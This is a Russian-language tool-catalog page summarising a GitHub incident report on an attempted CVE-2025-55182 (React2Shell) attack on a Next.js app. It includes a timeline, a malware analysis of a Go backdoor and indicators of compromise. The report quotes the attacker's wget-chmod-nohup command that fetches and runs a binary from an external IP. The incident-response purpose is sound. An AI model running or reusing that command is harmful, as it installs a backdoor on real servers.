Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-Attack-Analysis — Анализ реальных атак на CVE-2025-55182 (React2Shell) — уязвимость удалённого выполнения кода (RCE) в React Server Components | Kitploit
Инструменты/GitHubGitHub/ngvcanh/cve-2025-55182-attack-analysis
Управление индикаторами компрометации (IOC)Анализ уязвимостейФорензикаВеб-безопасностьАнализ вредоносных программРазведка угрозОбучение и ОбразованиеРеагирование на Инциденты

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
GitHub
ngvcanh/cve-2025-55182-attack-analysis

CVE-2025-55182-Attack-Analysis

Анализ реальных атак на CVE-2025-55182 (React2Shell) — уязвимость удалённого выполнения кода (RCE) в React Server Components

Репозиторий
169 месяцев назадЕщё не проверено
Поделиться

Анализ атаки CVE-2025-55182: Удалённое выполнение кода в React Server Components

Анализ реальной атаки на production-приложение Next.js

📋 Содержание

  • Краткое резюме
  • Обзор уязвимости
  • Хронология атаки
  • Технический анализ
  • Анализ вредоносного ПО
  • Индикаторы компрометации (IOC)
  • Меры по устранению и реагированию
  • Выводы
  • Ссылки

Краткое резюме

5 декабря 2025 года наше production-приложение Next.js подверглось атаке злоумышленников, эксплуатировавших CVE-2025-55182 (React2Shell) — критическую уязвимость удалённого выполнения кода (RCE) в React Server Components. В ходе атаки была предпринята попытка загрузить и запустить на нашем сервере Linux-троян типа backdoor.

АтрибутЗначение
CVE IDCVE-2025-55182
Оценка CVSS9.8 (критическая)
Дата атаки5 декабря 2025 года
Результат атаки✅ Заблокирована (после установки патча)
Тип вредоносного ПОLinux-троян типа backdoor
Затронутый стекNext.js + React Server Components

Обзор уязвимости

Что такое CVE-2025-55182?

CVE-2025-55182, также известная как «React2Shell», — критическая уязвимость удалённого выполнения кода (RCE), затрагивающая React Server Components (RSC) в:

  • React: версии 19.0.0 - 19.2.1
  • Next.js: версии 15.x и 16.x (до установки патчей)

Первопричина

Уязвимость находится в функции renderToReadableStream() внутри Flight Server в React. При обработке специально сформированных RSC-полезных нагрузок сервер не выполняет должную санитизацию определённых входных данных, что приводит к произвольному выполнению кода.

Вектор атаки

Attacker → Malicious RSC Payload → Flight Server → eval() → RCE

Атакующий отправляет специально сформированный POST-запрос с вредоносной сериализованной полезной нагрузкой, которая десериализуется и выполняется на сервере.


Хронология атаки

Этап 1: Первые попытки эксплуатации (до установки патча)

Время (UTC)Событие
5 дек., 06:20Первая атака обнаружена через Sentry
5 дек., 06:20Полезная нагрузка пытается выполнить shell-команды
5 дек., 06:20Атака частично успешна (до установки патча)

Журнал ошибок Sentry (до установки патча):

Error: root
  at eval (eval at <anonymous>, <anonymous>:3:6)
  at nk (chunk.js)
  at JSON.parse (<anonymous>)
  at n5 (/app/node_modules/next/dist/server/app-render.js)

Этап 2: Развёртывание патча

ВремяДействие
4 дек., 14:13Обновление до Next.js 16.0.7
4 дек., 14:13Развёрнута пропатченная версия (v1.0.0-beta-4)

Этап 3: Атака заблокирована после установки патча

Время (UTC)Событие
5 дек., 08:48Попытка атаки обнаружена
5 дек., 08:48Выполнение полезной нагрузки ЗАБЛОКИРОВАНО
5 дек., 08:48Ошибка: syntax error: unexpected ";"

Журнал ошибок Sentry (после установки патча):

Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ; 
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"

Патч успешно предотвратил выполнение вредоносной команды.


Технический анализ

Детали атакующего запроса

АтрибутЗначение
Целевой URLhttps://[REDACTED]/
МетодPOST
User-AgentPython Requests 2.31
ИсточникАвтоматизированный скрипт атаки

Анализ полезной нагрузки

Атакующий попытался выполнить следующую цепочку команд:

wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim

Разбор по шагам:

ШагКомандаНазначение
1wget http://45.76.155.14/vim -O /tmp/vimЗагрузка вредоносного ПО
2chmod +x /tmp/vimСделать исполняемым
3nohup /tmp/vim > /dev/null 2>&1 &Запуск в фоне, сохранение после выхода из сессии
4rm -f /tmp/vimУдаление улик

Окружение сервера

КомпонентВерсия
ОСAlpine Linux 3.23.0
Среда выполненияNode.js v20.19.6
ФреймворкNext.js 16.0.7 (пропатчен)
КонтейнерDocker

Анализ вредоносного ПО

Информация о файле

АтрибутЗначение
Имя файлаvim (замаскирован под легитимный инструмент)
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
Тип файлаELF 64-bit LSB executable, x86-64
ЯзыкGo (скомпилированный бинарный файл)
Размер файла~4.7 МБ

Результаты VirusTotal

Уровень обнаружения: 13/72 (18 %)

ВендорИмя обнаружения
DrWebLinux.BackDoor.Siggen.389
AhnLab-V3Backdoor/Linux.Agent.4780032
KasperskyHEUR:Trojan.Linux.Agent.gen
ESET-NOD32Linux/Agent.PX Trojan
Avast/AVGELF:Agent-BQE [Trj]
AliCloudTrojan:Linux/Agent.ff565f70
Antiy-AVLTrojan/Linux.Agent.px
RisingTrojan.Agent/Linux!8.13268
SentinelOneStatic AI - Suspicious ELF
TencentMalware.Linux.Generic.1c03c8b9
ZillyaTrojan.Agent.Linux.5292

Ссылка на VirusTotal: Просмотреть анализ

Анализ бинарного файла

Заголовок ELF:

00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000  ..>.....`.E.....

Выявленные возможности:

ВозможностьПодтверждение
HTTP/HTTPS-клиентnet/http, *http.Client
TLS-шифрованиеcrypto/tls, crypto/aes
SOCKS5-проксиsocks, socks5
DNS-резолвингnet/dns/dnsmessage
Стойкая криптографияchacha20poly1305, Ed25519

Извлечённые строки (релевантные):

crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack

Сработавшие правила IDS

СерьёзностьПравилоИсточник
НИЗКАЯET POLICY HTTP traffic on port 443 (POST)Proofpoint ET Open
НИЗКАЯET DNS Query for .cc TLDProofpoint ET Open

Классификация вредоносного ПО

Тип: Linux-троян типа backdoor

Возможности:

  • Удалённый доступ к shell
  • Связь с командным центром (C2)
  • Загрузка и скачивание файлов
  • Шифрованная связь
  • Туннелирование трафика через SOCKS5
  • Механизмы закрепления в системе

Индикаторы компрометации (IOC)

Сетевые IOC

ТипЗначениеОписание
IP-адрес45.76.155.14Сервер распространения вредоносного ПО
URLhttp://45.76.155.14/vimURL загрузки вредоносного ПО
ХостингVultr VPSОблачный провайдер
TLD.ccДомен C2 использует TLD .cc

Файловые IOC

ТипЗначение
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
SHA1[Рассчитать при необходимости]
MD5[Рассчитать при необходимости]
Имя файлаvim (замаскирован)
Тип файлаELF 64-bit x86-64
Размер файла~4.7 МБ

Поведенческие IOC

ИндикаторОписание
wget на внешний IPЗагрузка с нестандартных URL
Файлы в /tmp/Подозрительный исполняемый файл во временной директории
nohup + фоновое выполнениеПопытка закрепления в системе
Немедленное удаление файлаЗачистка улик
User-Agent Python RequestsИнструмент автоматизированной атаки

YARA-правило

Скачать инструмент